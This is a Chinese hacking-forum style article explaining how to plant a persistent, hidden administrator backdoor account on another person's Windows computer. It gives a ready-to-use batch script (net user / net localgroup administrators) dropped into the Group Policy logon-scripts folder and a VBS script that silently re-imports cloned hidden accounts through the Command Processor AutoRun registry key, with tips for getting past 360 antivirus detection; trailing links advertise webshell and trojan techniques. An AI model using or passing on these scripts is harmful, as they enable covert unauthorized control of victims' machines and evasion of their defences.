windows下建立永久帐号方法

所属分类: 网络安全 / 黑客入侵 阅读数: 158
收藏 0 赞 0 分享
操作步骤:

1、在自己电脑里面建立一个.txt文本文件.
2、在里面输入内容:

@echo off
net user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码;
net localgroup administrators xixi /add

3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要是bat;
4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。别忘了将文件属性设为“隐藏”哦!

完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!

如果把里面的内容改成:

@echo off
net user administrator 123456 /add

意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456

作者:xixi

逍遥复仇点评:以上应该对应的就是组策略里计算机管理中的“登录”和“注销”脚本,打开gpedit.msc找找看,听说此法360能检测出来,我是没有试,你可以先用360扫一下如果能查出来将其设为信任就OK了!

强调一下本文貌似要配合《安静运行批处理vbs脚本》才算是完美!既然都走到这里了《建立超级隐藏账号方法》这篇也一起看了吧!

==================================================================

另外一种命令行截持重建帐号的方法:

将已在注册中克隆好的帐号分别导出一份,比如"guest$.reg"和"0x3f5.reg"复制c:\windows\目录下,然后在同目录下建立一个cmd.vbs脚本内容如下:

On Error Resume Next
set yecha=wscript.createobject("wscript.shell")
yecha.run "regedit.exe /s guest$.reg",0
yecha.run "regedit.exe /s 0x3f5.reg",0

在注册表中这个项KEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun里AutoRun键值中输入我们的脚本路径就OK。

(这个项起的作用是打开CMD自动运行我们编辑好的脚本文件)

提示:360安全卫士能查的出来显示为“命令行截持”,TNND,我把它加入信任了就没事了,管理员神精了会天天翻360那个不起眼的地方?

整理作者:逍遥复仇
更多精彩内容其他人还在看

黑客谈MS07-029域名DNS漏洞利用入侵过程

前言: MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。 今天
收藏 0 赞 0 分享

黑客教你SQL注入Access导出WebShell的方法

热 点: 已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。 最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。
收藏 0 赞 0 分享

一个注射点,一个webshell甚至系统权限

————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限 声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为 发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性
收藏 0 赞 0 分享

黑客实战:一次简单脚本攻击实例

一、开篇 今天闲着无聊,到本地区的一个社区上转转,那些人污言秽语的,有个帖子还侵犯了一个朋友的版权,跟贴说了那人几句,管理员也不管,实在看不下去了,打算给管理员盆冷水清醒清醒。 二、准备/分析 安全第一,先开个HTTP代理,打开社区的登陆页面,
收藏 0 赞 0 分享

eWebEditor编辑器成网站中的隐形炸弹

站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这
收藏 0 赞 0 分享

系统泄露密码的入侵攻击分析

WINDOWS访问139端口时自动用当前用户、密码连接,造成泄露用户密码,虽然其密码是加密的,但一样可以用来攻击。   下面是SMB的密码认证方式。   WINDOWS的139口的访问过程,箭头表示数据方向:   1.客户端<---------------
收藏 0 赞 0 分享

看看黑客是怎样使用Google黑掉Windows服务器

在我的《为什么使用Google扫描安全漏洞》的技巧中,我讨论了如何使用Google.com来执行对你的面向公众的服务器的安全扫描――包括Windows、IIS、Apache和(但愿不会如此!)SQL Server。你能使用它得到服务器的信息、包含敏感信息的文件和检测出&ldquo
收藏 0 赞 0 分享

黑客总结的实用的网站渗透步骤

本文是黑客们总结的比较实用的网站渗透的一些步骤
收藏 0 赞 0 分享

一句话木马加密 过护卫神云查杀系统 过shell扫描器

这个一句话木马最近被利用的很多,很多扫描工具扫描不到,不过一些asp版的扫描工具支持扫描eval和execute,如果发现如下代码,请删除,下面就是他们常发的木马后门
收藏 0 赞 0 分享

安全狗下添加用户的另一方法(大量操作实现突破)

这篇文章主要是针对安装服务器安全狗的机器,突破添加用户的操作,用for循环实现,但如果服务器安装了360就无法使用
收藏 0 赞 0 分享
查看更多